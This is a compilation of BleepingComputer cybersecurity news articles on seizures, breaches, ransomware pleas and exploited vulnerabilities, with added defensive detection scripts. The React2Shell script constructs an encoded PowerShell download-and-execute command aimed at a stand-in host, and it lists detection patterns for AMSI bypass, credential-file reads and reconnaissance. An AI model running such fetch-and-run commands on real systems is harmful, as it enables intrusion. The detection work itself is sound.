bleepingcomputer.com
By Lawrence Abrams
January 28, 2026
The FBI has seized the notorious RAMP cybercrime forum, a platform used to advertise a wide range of malware and hacking services, and one of the few remaining forums that openly allowed the promotion of ransomware operations.
Both the forum's Tor site and its clearnet domain, ramp4u[.]io, now display a seizure notice stating, "The Federal Bureau of Investigation has seized RAMP."
"This action has been taken in coordination with the United States Attorney's Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice," the notice reads.
The seizure banner also appears to taunt the forum's operators by displaying RAMP's own slogan, "THE ONLY PLACE RANSOMWARE ALLOWED!", followed by a winking Masha from the popular Russian kids' cartoon "Masha and the Bear".
While there has been no official announcement by law enforcement regarding this seizure, the domain name servers have now been switched to those used by the FBI when seizing domains:
Name Server: ns1.fbi.seized.gov
Name Server: ns2.fbi.seized.gov
If the seizure is genuine, law enforcement now has access to a significant amount of data tied to the forum's users, including email addresses, IP addresses, private messages, and other potentially incriminating information.
For threat actors who failed to follow proper operational security (opsec), this could lead to identification and arrests.
In a forum post to the XSS hacking forum, one of the alleged former RAMP operators known as "Stallman" confirmed the seizure.
"I regret to inform you that law enforcement has seized control of the Ramp forum," reads the translated forum post.
"This event has destroyed years of my work building the freest forum in the world, and while I hoped this day would never come, I always knew in my heart it was possible. It's a risk we all take."
BleepingComputer contacted the FBI with questions regarding the seizure, but they declined to comment.
The RAMP cybercrime forum
The RAMP cybercrime forum launched in July 2021, following the banning of the promotion of ransomware operations by popular Russian-speaking Exploit and XSS hacking forums.
This ban was due to heightened pressure from Western law enforcement following the DarkSide ransomware attack on Colonial Pipeline.
Exploit banning ransomware promotion
In July 2021, a new Russian-speaking forum called RAMP launched, promoting itself as one of the last remaining places where ransomware could be openly promoted. This led to multiple ransomware gangs using the forum to promote their operations, recruit affiliates, and buy and sell access to networks.
RAMP was launched by a threat actor known as Orange, who also operated under the aliases Wazawaka and BorisElcin.
Orange was previously the administrator of the Babuk ransomware operation, which shut down after its ransomware attack on the D.C. Metropolitan Police Department.
Internal disputes allegedly erupted within the group over whether stolen law enforcement data should be publicly leaked, and after the data was leaked, the group splintered.
Following the split, Orange launched the RAMP forum on a Tor onion domain that Babuk had previously used.
Soon after its launch, RAMP experienced distributed denial-of-service (DDoS) attacks that disrupted its availability. Orange publicly blamed former Babuk partners for the attacks, though the previous members denied responsibility to BleepingComputer, stating they had no interest in the forum.
The individual behind the Orange and Wazawaka aliases was later publicly identified by cybersecurity journalist Brian Krebs as Russian national Mikhail Matveev.
In an interview with Recorded Future's Dmitry Smilyanets, Matveev confirmed that he previously operated under the alias Orange and that he created RAMP using the former Babuk onion domain.
Matveev explained that the forum was initially created to repurpose Babuk's existing infrastructure and traffic. He claimed that RAMP ultimately generated no profit and was subjected to constant DDoS attacks, which led him to step away from managing it after it gained popularity.
In 2023, Matveev was indicted by the U.S. Department of Justice for his involvement in multiple ransomware operations, including Babuk, LockBit, and Hive, which targeted U.S. healthcare organizations, law enforcement agencies, and other critical infrastructure.
He was also sanctioned by the U.S. Treasury's Office of Foreign Assets Control and placed on the FBI's most-wanted list, with the U.S. State Department offering a reward of up to $10 million for information leading to his arrest or conviction.
bleepingcomputer.com
By Sergiu Gatlan
January 21, 2026 12:49 PM
Fortinet customers are seeing attackers exploiting a patch bypass for a previously fixed critical FortiGate authentication vulnerability (CVE-2025-59718) to hack patched firewalls.
One of the affected admins said that Fortinet has allegedly confirmed that the latest FortiOS version (7.4.10) didn't fully address this authentication bypass vulnerability, which should've been patched in early December with the release of FortiOS 7.4.9.
Fortinet is also reportedly planning to release FortiOS 7.4.11, 7.6.6, and 8.0.0 over the coming days to fully patch the security flaw.
"We just had a malicious SSO login on one of our FortiGates running on 7.4.9 (FGT60F). We have a SIEM that caught the local admin account being created. Now, I have done a little research, and it appears this is exactly how it looked when someone came in on CVE-2025-59718. But we have been on 7.4.9 since December 30th," the admin said.
The customer shared logs showing that the admin user was created from an SSO login of cloud-init@mail.io from IP address 104.28.244.114. These logs looked similar to previous exploitation of CVE-2025-59718 seen by cybersecurity company Arctic Wolf in December 2025, which reported that attackers were actively exploiting the vulnerability via maliciously crafted SAML messages to compromise admin accounts.
"We observed the same activity. Also running 7.4.9. Same user login and IP address. Created a new system admin user named "helpdesk". We have an open ticket with support. Update: The Fortinet developer team has confirmed the vulnerability persists or is not fixed in v7.4.10," another one added.
BleepingComputer reached out to Fortinet multiple times this week with questions about these reports, but the company has yet to reply.
Until Fortinet provides a fully patched FortiOS release, admins are advised to temporarily disable the vulnerable FortiCloud login feature (if enabled) to secure their systems against attacks.
To disable FortiCloud login, you have to navigate to System -> Settings and switch "Allow administrative login using FortiCloud SSO" to Off. However, you can also run the following commands from the command-line interface:
config system global
set admin-forticloud-sso-login disable
end
Luckily, as Fortinet explains in its original advisory, the FortiCloud single sign-on (SSO) feature targeted in the attacks is not enabled by default when the device is not FortiCare-registered, which should reduce the total number of vulnerable devices.
However, Shadowserver still found over 25,000 Fortinet devices exposed online with FortiCloud SSO enabled in mid-December. At the moment, more than half have been secured, with Shadowserver now tracking just over 11,000 that are still reachable over the Internet.
CISA has also added the CVE-2025-59718 FortiCloud SSO auth bypass flaw to its list of actively exploited vulnerabilities, ordering federal agencies to patch within a week.
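The pattern the affected admins describe above (an SSO login followed minutes later by a new local admin account) is easy to hunt for in event logs, and the CLI setting from the mitigation can be checked from a config dump. The following is an added example, not Fortinet's code or log schema: the sample events are constructed and only loosely modelled on FortiGate key=value logs, and the field names (action, method, cfgpath, cfgobj) and the 30-minute window are assumptions to map onto your own SIEM's parsed fields.

```python
"""Flag local admin accounts created from a FortiCloud SSO session.

Added example, not Fortinet's code or log schema. The sample events are
constructed and only loosely modelled on FortiGate key=value event logs;
the field names (action, method, cfgpath, cfgobj) and the 30-minute window
are assumptions you must map onto your own SIEM's parsed fields.
"""
import re
import shlex
from datetime import datetime, timedelta

# Constructed sample log. The SSO user and source IP are the values quoted in
# the article; every other field is invented for the demo.
SAMPLE_LOGS = """\
date=2026-01-20 time=03:14:02 type=event subtype=system action=login status=success method=sso user="cloud-init@mail.io" srcip=104.28.244.114 msg="Administrator logged in via FortiCloud SSO"
date=2026-01-20 time=03:14:40 type=event subtype=system action=add cfgpath=system.admin cfgobj=helpdesk user="cloud-init@mail.io" srcip=104.28.244.114 msg="Add system.admin helpdesk"
date=2026-01-20 time=09:02:11 type=event subtype=system action=login status=success method=local user="admin" srcip=10.0.0.5 msg="Administrator logged in"
date=2026-01-20 time=09:03:00 type=event subtype=system action=add cfgpath=system.admin cfgobj=backupadmin user="admin" srcip=10.0.0.5 msg="Add system.admin backupadmin"
"""

SSO_TO_ADMIN_WINDOW = timedelta(minutes=30)


def parse_event(line):
    """Split one key=value line into a dict; quoted values may contain spaces."""
    fields = {}
    for token in shlex.split(line):
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    fields["_ts"] = datetime.strptime(f"{fields['date']} {fields['time']}", "%Y-%m-%d %H:%M:%S")
    return fields


def find_sso_admin_creations(log_text, window=SSO_TO_ADMIN_WINDOW):
    """Return alerts for system.admin objects added by an actor whose most
    recent successful login came through SSO within `window`."""
    last_sso_login = {}  # (user, srcip) -> time of most recent SSO login
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_event(raw)
        actor = (ev.get("user"), ev.get("srcip"))
        if ev.get("action") == "login" and ev.get("status") == "success":
            if ev.get("method") == "sso":
                last_sso_login[actor] = ev["_ts"]
            else:
                last_sso_login.pop(actor, None)  # a local login resets the actor
        elif ev.get("action") == "add" and ev.get("cfgpath") == "system.admin":
            seen = last_sso_login.get(actor)
            if seen is not None and ev["_ts"] - seen <= window:
                alerts.append({
                    "created_admin": ev.get("cfgobj"),
                    "by_user": ev.get("user"),
                    "srcip": ev.get("srcip"),
                    "at": ev["_ts"].isoformat(),
                })
    return alerts


def forticloud_sso_enabled(config_text):
    """Inspect 'config system global' output for the mitigation setting named
    in the article. Returns True/False, or None when the line is absent."""
    m = re.search(r"^\s*set admin-forticloud-sso-login\s+(enable|disable)\b", config_text, re.M)
    if m is None:
        return None
    return m.group(1) == "enable"


if __name__ == "__main__":
    for alert in find_sso_admin_creations(SAMPLE_LOGS):
        print("ALERT:", alert)
```

Feed `forticloud_sso_enabled` the output of `show system global` from each firewall to confirm the mitigation is actually in place after you apply it.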
Hackers are now also actively exploiting a critical Fortinet FortiSIEM vulnerability with publicly available proof-of-concept exploit code that can enable them to gain code execution with root privileges on unpatched devices.
bleepingcomputer.com
By Lawrence Abrams
January 15, 2026
Exclusive: Food delivery platform Grubhub has confirmed a recent data breach after hackers accessed its systems, with sources telling BleepingComputer the company is now facing extortion demands.
"We're aware of unauthorized individuals who recently downloaded data from certain Grubhub systems," Grubhub told BleepingComputer.
"We quickly investigated, stopped the activity, and are taking steps to further increase our security posture. Sensitive information, such as financial information or order history, was not affected."
Grubhub would not respond to any further questions regarding the breach, including when it occurred, whether customer data was involved, or if they were being extorted.
However, the company confirmed that it is working with a third-party cybersecurity firm and has notified law enforcement.
Last month, Grubhub was also linked to a wave of scam emails sent from its b.grubhub.com subdomain that promoted a cryptocurrency scam promising a tenfold return on Bitcoin payments.
Grubhub said at the time that it contained the issue and took steps to prevent further unauthorized messages, but would not answer further questions related to the incident.
It is unclear if the two incidents are connected.
Extorted by hackers
While Grubhub would not share further details, multiple sources have told BleepingComputer that the ShinyHunters cybercrime group is extorting the company.
BleepingComputer attempted to verify these claims with the threat actors, but they refused to comment.
According to sources, the threat actors are demanding a Bitcoin payment to prevent the release of older Salesforce data from a February 2025 breach and newer Zendesk data that was stolen in the recent breach.
Grubhub uses Zendesk to power its online support chat system, which provides support for orders, account issues, and billing.
While it is unclear when the breach occurred, BleepingComputer was told that it was through secrets/credentials stolen in the recent Salesloft Drift data theft attacks.
In August, threat actors used stolen OAuth tokens for Salesloft's Salesforce integration to conduct a data theft campaign between August 8 and August 18, 2025.
According to a report by Google's Threat Intelligence team (Mandiant), the stolen data was then used to harvest credentials and secrets to conduct follow-up attacks on other platforms.
"GTIG observed UNC6395 targeting sensitive credentials such as Amazon Web Services (AWS) access keys (AKIA), passwords, and Snowflake-related access tokens," reports Google.
ShinyHunters claimed at the time to be behind the breach, stating they stole approximately 1.5 billion data records from the "Account", "Contact", "Case", "Opportunity", and "User" Salesforce object tables for 760 companies.
As threat actors continue to abuse previously stolen Salesforce data to carry out follow-on attacks, organizations impacted by the Salesloft Drift breaches must rotate all affected access tokens and secrets as soon as possible if they have not already done so.
bleepingcomputer.com
By Sergiu Gatlan
January 5, 2026
NordVPN denied allegations that its internal Salesforce development servers were breached, saying that cybercriminals obtained "dummy data" from a trial account on a third-party automated testing platform.
The company's statement comes after a threat actor (using the 1011 handle) claimed on a hacking forum over the weekend that they stole more than 10 databases containing sensitive information like Salesforce API keys and Jira tokens, following a brute-force attack against a NordVPN development server.
"Today I am leaking +10 DB's source codes from a NordVPN development server. This information was acquired by bruteforcing a misconfigured server of NordVPN, which has salesforce and jira information stored. Compromised information: SalesForce api keys, jira tokens and more," the threat actor said.
However, as NordVPN revealed today, this is actually test data stolen from a temporary test environment deployed months earlier while trialing a potential vendor for automated testing.
The Lithuanian VPN service added that the test environment had no connection with its own infrastructure and that the stolen data doesn't include sensitive customer or business information.
"The leaked elements, such as the specific API tables and database schemas can only be artifacts of an isolated third-party test environment, containing only dummy data used for functionality checks. While no data in the dump points to NordVPN, we have contacted the vendor for additional information," NordVPN explained.
"Because this was a preliminary test and no contract was ever signed, no real customer data, production source code, or active sensitive credentials were ever uploaded to this environment.
"We ultimately chose a different vendor and did not proceed with the one we tested. The environment in question was never connected to our production systems."
While this was only a false alarm, in 2019, hackers breached the servers of NordVPN and TorGuard, gaining full root access and stealing private keys used to secure their web servers and VPN configurations.
In response to the 2019 incident, NordVPN introduced a bug bounty program and hired outside cybersecurity experts for a "full-scale" third-party security audit.
The company also announced plans to switch to dedicated servers that they own exclusively and to upgrade their entire 5,100-server infrastructure to RAM servers.
bleepingcomputer.com
By Sergiu Gatlan
December 30, 2025
Two former employees of cybersecurity incident response companies Sygnia and DigitalMint have pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.
33-year-old Ryan Clifford Goldberg of Watkinsville, Georgia (in federal custody since September 2023), and 28-year-old Kevin Tyler Martin of Roanoke, Texas, who were charged in November, have now pleaded guilty to conspiracy to obstruct commerce by extortion and are set to be sentenced on March 12, 2026, facing up to 20 years in prison each.
Together with a third accomplice, the two BlackCat ransomware affiliates breached the networks of multiple victims across the United States between May 2023 and November 2023, paying a 20% share of ransoms in exchange for access to BlackCat's ransomware and extortion platform.
Goldberg is a former Sygnia incident response manager, and Martin worked at DigitalMint as a ransomware threat negotiator (as did the unnamed co-conspirator).
"These defendants used their sophisticated cybersecurity training and experience to commit ransomware attacks — the very type of crime that they should have been working to stop," said Assistant Attorney General A. Tysen Duva. "Extortion via the internet victimizes innocent citizens every bit as much as taking money directly out of their pockets."
According to court documents, their alleged victims include a Maryland pharmaceutical company, a California engineering firm, a Tampa medical device manufacturer, a Virginia drone manufacturer, and a California doctor's office.
While they demanded ransoms ranging from $300,000 to $10 million, prosecutors said they were only paid $1.27 million, by the Tampa medical device company, after encrypting its servers and demanding $10 million in May 2023. While other victims also received ransom demands, the indictment does not indicate whether additional payments were made.
As BleepingComputer previously reported, the Justice Department was also investigating a former DigitalMint negotiator in July for allegedly working with ransomware groups. However, the DOJ and FBI did not comment on the investigation, and it is unclear if this case is related to it.
In December 2023, the FBI created a decryption tool after breaching BlackCat's servers to monitor their activities and obtain decryption keys. The FBI also found that the BlackCat operation collected at least $300 million in ransom payments from more than 1,000 victims until September 2023.
In a February 2024 joint advisory, the FBI, CISA, and the Department of Health and Human Services (HHS) also warned that Blackcat affiliates were primarily targeting organizations in the U.S. healthcare sector.
bleepingcomputer.com
By Bill Toulas
December 19, 2025
The Nigerian police have arrested three individuals linked to targeted Microsoft 365 attacks carried out with the Raccoon0365 phishing-as-a-service platform.
The attacks led to business email compromise, data breaches, and financial losses affecting organizations worldwide.
The law enforcement operation was possible thanks to intelligence from Microsoft, shared with the Nigeria Police Force National Cybercrime Centre (NPF–NCCC) via the FBI.
The authorities identified individuals who administered the phishing toolkit ‘Raccoon0365,’ which automated the creation of fake Microsoft login pages for credential theft.
The service, which was responsible for at least 5,000 Microsoft 365 account compromises across 94 countries, was disrupted by Microsoft and Cloudflare last September.
It is unclear if the disruption operation helped identify those behind Raccoon0365 in Nigeria.
BleepingComputer contacted Microsoft for clarifications but a comment wasn't immediately available.
“Acting on precise and actionable intelligence, NPF–NCCC operatives were deployed to Lagos and Edo States, leading to the arrest of three suspects,” reads the police’s announcement.
“Search operations conducted at their residences resulted in the recovery of laptops, mobile devices, and other digital equipment, which have been linked to the fraudulent scheme after forensic analysis.”
One of the arrested suspects is an individual named Okitipi Samuel, also known online as “RaccoonO365” and “Moses Felix,” whom the police believe is the developer of the phishing platform.
Samuel operated a Telegram channel where he sold phishing kits to other cybercriminals in exchange for cryptocurrency, while he also hosted the phishing pages on Cloudflare using accounts registered with compromised credentials.
The Telegram channel counted over 800 members around the time of the disruption, and the reported access fees ranged from $355/month to $999/3 months.
Cloudflare estimates that the service is used primarily by Russia-based cybercriminals.
Regarding the other two arrested individuals, the police stated they have no evidence linking them to the creation or operation of Raccoon0365.
The person that Microsoft previously identified as the leader of the phishing service, Joshua Ogundipe, is not mentioned in the police’s announcement.
bleepingcomputer.com
By Lawrence Abrams
December 6, 2025
Over 77,000 Internet-exposed IP addresses are vulnerable to the critical React2Shell remote code execution flaw (CVE-2025-55182), with researchers now confirming that attackers have already compromised over 30 organizations across multiple sectors.
React2Shell is an unauthenticated remote code execution vulnerability that can be exploited via a single HTTP request and affects all frameworks that implement React Server Components, including Next.js, which uses the same deserialization logic.
React disclosed the vulnerability on December 3, explaining that unsafe deserialization of client-controlled data inside React Server Components enables attackers to trigger remote, unauthenticated execution of arbitrary commands.
Developers are required to update React to the latest version, rebuild their applications, and then redeploy to fix the vulnerability.
On December 4, security researcher Maple3142 published a working proof-of-concept demonstrating remote command execution against unpatched servers. Soon after, scanning for the flaw accelerated as attackers and researchers began using the public exploit with automated tools.
Over 77,000 vulnerable IP addresses
The Shadowserver Internet watchdog group now reports that it has detected 77,664 IP addresses vulnerable to the React2Shell flaw, with approximately 23,700 in the United States.
The researchers determined which IP addresses were vulnerable using a detection technique developed by Searchlight Cyber/Assetnote, in which an HTTP request that exercises the flaw is sent to each server and a specific response is checked to confirm whether the device is vulnerable.
GreyNoise also recorded 181 distinct IP addresses attempting to exploit the flaw over the past 24 hours, with most of the traffic appearing automated. The researchers say the scans are primarily originating from the Netherlands, China, the United States, Hong Kong, and a small number of other countries.
Palo Alto Networks reports that more than 30 organizations have already been compromised through the React2Shell flaw, with attackers exploiting the vulnerability to run commands, conduct reconnaissance, and attempt to steal AWS configuration and credential files.
These compromises include intrusions linked to known state-associated Chinese threat actors.
Widespread exploitation of React2Shell
Since its disclosure, researchers and threat intelligence companies have observed widespread exploitation of the CVE-2025-55182 flaw.
GreyNoise reports that attackers frequently begin with PowerShell commands that perform a basic math function to confirm the device is vulnerable to the remote code execution flaw.
These tests return predictable results while leaving minimal signs of exploitation:
powershell -c "4013841979"
powershell -c "4032043488"
Once remote code execution was confirmed, attackers were seen executing base64-encoded PowerShell commands that download additional scripts directly into memory.
powershell -enc <base64>
One observed command executes a second-stage PowerShell script from the external site (23[.]235[.]188[.]3), which is used to disable AMSI to bypass endpoint security and deploy additional payloads.
According to VirusTotal, the PowerShell script observed by GreyNoise installs a Cobalt Strike beacon on the targeted device, giving threat actors a foothold on the network.
Amazon AWS threat intelligence teams also saw rapid exploitation hours after the disclosure of the React CVE-2025-55182 flaw, with infrastructure associated with China-linked APT hacking groups known as Earth Lamia and Jackpot Panda.
In this exploitation, the threat actors perform reconnaissance on vulnerable servers by using commands such as whoami and id, attempting to write files, and reading /etc/passwd.
Palo Alto Networks also observed similar exploitation, attributing some of it to UNC5174, a Chinese state-sponsored threat actor believed to be tied to the Chinese Ministry of State Security.
"Unit 42 observed threat activity we assess with high confidence is consistent with CL-STA-1015 (aka UNC5174), a group suspected to be an initial access broker with ties to the Chinese Ministry of State Security," Justin Moore, Senior Manager at Palo Alto Networks Unit 42, told BleepingComputer via email.
"In this activity, we observed the deployment of Snowlight and Vshell malware, both highly consistent with Unit 42 knowledge of CL-STA-1015 (also known as UNC5174)."
The malware deployed in these attacks is:
Snowlight: A malware dropper that allows remote attackers to drop additional payloads on breached devices.
Vshell: A backdoor commonly used by Chinese hacking groups for remote access, post-exploitation activity, and to move laterally through a compromised network.
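The indicators described above (numeric PowerShell probes, encoded commands that pull a second stage into memory, and whoami/id//etc/passwd reconnaissance spawned by the web application's process) can be turned into a log triage routine. The script below is an added example, not GreyNoise's or Unit 42's tooling; the log line format, the parent-process names and the keyword list are assumptions, and the encoded sample command is constructed here, pointing at a documentation-range address rather than a real indicator.

```python
"""Triage command-execution logs for React2Shell-style PowerShell activity.

Added example, not GreyNoise's or Palo Alto's tooling. The log format
(timestamp, host, parent process, command line) is an assumption chosen for
this demo; adapt LINE_RE to your EDR or web-server logs.
"""
import base64
import re
from typing import Optional

# Constructed sample: an encoded command of the kind described in the article
# (a download cradle that runs a second stage straight from memory). The host
# 203.0.113.10 is a documentation-range address, not a real indicator.
STAGE2_PLAINTEXT = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s2.ps1')"
STAGE2_ENCODED = base64.b64encode(STAGE2_PLAINTEXT.encode("utf-16-le")).decode("ascii")

SAMPLE_LOGS = [
    'ts=2025-12-05T10:01:11Z host=web01 parent=node.exe cmd=powershell -c "4013841979"',
    f"ts=2025-12-05T10:01:19Z host=web01 parent=node.exe cmd=powershell -enc {STAGE2_ENCODED}",
    "ts=2025-12-05T10:05:00Z host=web02 parent=node cmd=cat /etc/passwd",
    "ts=2025-12-05T10:05:03Z host=web02 parent=node cmd=whoami",
    'ts=2025-12-05T11:00:00Z host=web01 parent=explorer.exe cmd=powershell -c "Get-Date"',
]

LINE_RE = re.compile(r"ts=(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")
# A bare integer passed to -c: the low-noise "is it vulnerable" probe from the article.
NUMERIC_PROBE_RE = re.compile(r'^powershell(?:\.exe)?\s+-c(?:ommand)?\s+"?\d+"?$', re.I)
ENCODED_RE = re.compile(r"^powershell(?:\.exe)?\s+-e(?:nc|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]+)", re.I)
RECON_RE = re.compile(r"^(whoami|id)\b|/etc/passwd")
# Assumed parent processes that serve React Server Components apps.
WEB_PARENTS = {"node", "node.exe", "next-server"}
SUSPICIOUS_KEYWORDS = ("invoke-expression", "iex", "downloadstring", "amsi", "frombase64string")


def decode_encoded_command(b64: str) -> Optional[str]:
    """PowerShell -enc takes base64 of UTF-16LE text; None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmd: str) -> Optional[dict]:
    """Map one command line onto the exploitation stages seen in the wild."""
    if NUMERIC_PROBE_RE.match(cmd):
        return {"kind": "rce_probe", "detail": cmd}
    m = ENCODED_RE.match(cmd)
    if m:
        decoded = decode_encoded_command(m.group("b64")) or ""
        hits = [k for k in SUSPICIOUS_KEYWORDS if k in decoded.lower()]
        return {"kind": "encoded_powershell", "detail": decoded, "keywords": hits}
    if RECON_RE.search(cmd):
        return {"kind": "recon", "detail": cmd}
    return None


def triage(lines):
    """Return findings for every suspicious command, noting whether the
    web-application process spawned it (the React2Shell tell-tale)."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        verdict = classify(ev["cmd"])
        if verdict is None:
            continue
        verdict.update(
            host=ev["host"],
            ts=ev["ts"],
            parent=ev["parent"],
            spawned_by_web_app=ev["parent"] in WEB_PARENTS,
        )
        findings.append(verdict)
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOGS):
        print(finding["ts"], finding["host"], finding["kind"], finding.get("keywords", ""), finding["detail"])
```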
The rush to patch
Due to the severity of the React flaw, companies worldwide have rushed to install the patch and apply mitigations.
Yesterday, Cloudflare rolled out emergency detections and mitigations for the React flaw in its Web Application Firewall (WAF) due to its widespread exploitation and severity.
However, the update inadvertently caused an outage affecting numerous websites before the rules were corrected.
CISA has also added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by December 26, 2025, under Binding Operational Directive 22-01.
Organizations using React Server Components or frameworks built on top of them are advised to apply updates immediately, rebuild and redeploy their applications, and review logs for signs of PowerShell or shell command execution.
bleepingcomputer.com
By Bill Toulas
December 1, 2025
The popular open-source SmartTube YouTube client for Android TV was compromised after an attacker gained access to the developer's signing keys, leading to a malicious update being pushed to users.
The compromise became known when multiple users reported that Play Protect, Android's built-in antivirus module, blocked SmartTube on their devices and warned them of a risk.
The developer of SmartTube, Yuriy Yuliskov, admitted that his digital keys were compromised late last week, leading to the injection of malware into the app.
Yuliskov revoked the old signature and said he would soon publish a new version with a separate app ID, urging users to move to that one instead.
SmartTube is one of the most widely downloaded third-party YouTube clients for Android TVs, Fire TV sticks, Android TV boxes, and similar devices.
Its popularity stems from the fact that it is free, can block ads, and performs well on underpowered devices.
A user who reverse-engineered the compromised SmartTube version 30.51 found that it includes a hidden native library named libalphasdk.so [VirusTotal]. This library does not exist in the public source code, meaning it was being injected into release builds at build time.
"Possibly a malware. This file is not part of my project or any SDK I use. Its presence in the APK is unexpected and suspicious. I recommend caution until its origin is verified," cautioned Yuliskov on a GitHub thread.
The library runs silently in the background without user interaction, fingerprints the host device, registers it with a remote backend, and periodically sends metrics and retrieves configuration via an encrypted communications channel.
All this happens without any visible indication to the user. While there is no evidence of malicious activity such as account theft or participation in DDoS botnets, a library with these capabilities could enable such activity at any time.
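A native library that is absent from the public source tree but present in the shipped APK is the kind of discrepancy users and maintainers can check for themselves. The following is an added example, not SmartTube's or the developer's tooling: it builds a small constructed APK-style zip in memory (no real SmartTube binary is used), lists every lib/*.so entry not on an allowlist with its SHA-256 for a VirusTotal lookup, and diffs two builds file by file, which is the check you would run when hashes for the same version number disagree; the allowlist contents and library names are assumptions.

```python
"""Audit an Android APK for native libraries missing from the project's build.

Added example, not SmartTube's tooling. An APK is a zip, so the standard
library is enough: list lib/<abi>/*.so entries, flag the ones not on the
expected list, hash them for a VirusTotal lookup, and diff two builds.
The expected-library allowlist and all file contents here are constructed.
"""
import hashlib
import io
import zipfile

# Assumption: libraries a clean build of the app is expected to ship (hypothetical name).
EXPECTED_LIBS = {"libexoplayer_jni.so"}


def build_constructed_apk(extra_libs=()):
    """Create an in-memory zip laid out like an APK (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"<manifest/>")
        z.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 16)
        z.writestr("lib/armeabi-v7a/libexoplayer_jni.so", b"\x7fELF-clean-placeholder")
        for name in extra_libs:
            z.writestr(f"lib/armeabi-v7a/{name}", b"\x7fELF-unexpected-placeholder")
    return buf.getvalue()


def audit_native_libs(apk_bytes, expected=EXPECTED_LIBS):
    """Return (path, sha256, size) for every .so under lib/ not in `expected`."""
    unexpected = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for info in z.infolist():
            if not (info.filename.startswith("lib/") and info.filename.endswith(".so")):
                continue
            basename = info.filename.rsplit("/", 1)[-1]
            if basename in expected:
                continue
            digest = hashlib.sha256(z.read(info)).hexdigest()
            unexpected.append((info.filename, digest, info.file_size))
    return unexpected


def diff_builds(apk_a, apk_b):
    """Entries added, removed or changed (by SHA-256) between two APKs."""
    def table(apk_bytes):
        with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
            return {i.filename: hashlib.sha256(z.read(i)).hexdigest() for i in z.infolist()}
    a, b = table(apk_a), table(apk_b)
    return {
        "added": sorted(set(b) - set(a)),
        "removed": sorted(set(a) - set(b)),
        "changed": sorted(k for k in a.keys() & b.keys() if a[k] != b[k]),
    }


if __name__ == "__main__":
    clean = build_constructed_apk()
    tampered = build_constructed_apk(extra_libs=("libalphasdk.so",))
    for path, digest, size in audit_native_libs(tampered):
        print(f"UNEXPECTED {path} sha256={digest} size={size}")
    print(diff_builds(clean, tampered))
```

For a real APK, replace `build_constructed_apk` with `open("app.apk", "rb").read()` and populate `EXPECTED_LIBS` from the library names a clean source build produces.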
Although the developer announced on Telegram the release of safe beta and stable test builds, they have not reached the project's official GitHub repository yet.
Also, the developer has not provided full details of what exactly happened, which has created trust issues in the community.
Yuliskov promised to address all concerns once the final release of the new app is pushed to the F-Droid store.
Until the developer transparently discloses all points publicly in a detailed post-mortem, users are recommended to stay on older, known-to-be-safe builds, avoid logging in with premium accounts, and turn off auto-updates.
Impacted users are also recommended to reset their Google Account passwords, check their account console for unauthorized access, and remove services they don't recognize.
At this time, it is unclear exactly when the compromise occurred or which versions of SmartTube are safe to use. One user reported that Play Protect doesn't flag version 30.19, so it appears safe.
BleepingComputer has contacted Yuliskov to determine which versions of the SmartTube app were compromised, and he responded with the following:
"Some of the older builds that appeared on GitHub were unintentionally compromised due to malware present on my development machine at the time they were created. As soon as I noticed the issue in late November, I immediately wiped the system and cleaned the environment, including the GitHub repository."
"I became aware of the malware issue around version 30.47, but as users reported lately it started around version 30.43. So, for my understanding the compromised versions are: 30.43-30.47."
"After cleaning the environment, a couple of builds were released using the previous key (prepared on the clean system), but from version 30.55 onward I switched to a new key for full security. The differing hashes for 30.47 Stable v7a are likely the result of attempts to restore that build after cleaning the infected system."
Update 12/2 - Added developer comment and information.
bleepingcomputer.com
By Bill Toulas
November 20, 2025
Data from Italy's national railway operator, the FS Italiane Group, has been exposed after a threat actor breached the organization's IT services provider, Almaviva.
The hacker claims to have stolen 2.3 terabytes of data and leaked it on a dark web forum. According to the threat actor's description, the leak includes confidential documents and sensitive company information.
Almaviva is a large Italian company that operates globally, providing services such as software design and development, system integration, IT consulting, and customer relationship management (CRM) products.
Andrea Draghetti, Head of Cyber Threat Intelligence at D3Lab, says the leaked data is recent, and includes documents from the third quarter of 2025. The expert ruled out the possibility that the files were recycled from a Hive ransomware attack in 2022.
"The threat actor claims the material includes internal shares, multi-company repositories, technical documentation, contracts with public entities, HR archives, accounting data, and even complete datasets from several FS Group companies," Draghetti says.
"The structure of the dump, organized into compressed archives by department/company, is fully consistent with the modus operandi of ransomware groups and data brokers active in 2024–2025," the cybersecurity expert added.
Almaviva is a major IT services provider with over 41,000 employees across almost 80 branches in Italy and abroad, and an annual turnover of $1.4 billion last year.
FS Italiane Group (FS) is a 100% state-owned railway operator and one of the largest industrial companies in the country, with more than $18 billion in annual revenue. It manages railway infrastructure, passenger and freight rail transport, and also bus services and logistics chains.
While BleepingComputer’s press requests to both Almaviva and FS went unanswered, the IT firm eventually confirmed the breach via a statement to local media.
“In recent weeks, the services dedicated to security monitoring identified and subsequently isolated a cyberattack that affected our corporate systems, resulting in the theft of some data,” Almaviva said.
“Almaviva immediately activated security and counter-response procedures through its specialized team for this type of incident, ensuring the protection and full operability of critical services.”
The company also stated that it has informed authorities in the country, including the police, the national cybersecurity agency, and the country’s data protection authority. An investigation into the incident is ongoing with help and guidance from government agencies.
Almaviva promised to transparently provide updates as more information emerges from the investigation.
Currently, it is unclear if passenger information is present in the data leak or if the data breach is impacting other clients beyond FS.
BleepingComputer has contacted Almaviva with additional questions, but we have not received a response by publication time.
bleepingcomputer.com
By Sergiu Gatlan
November 21, 2025
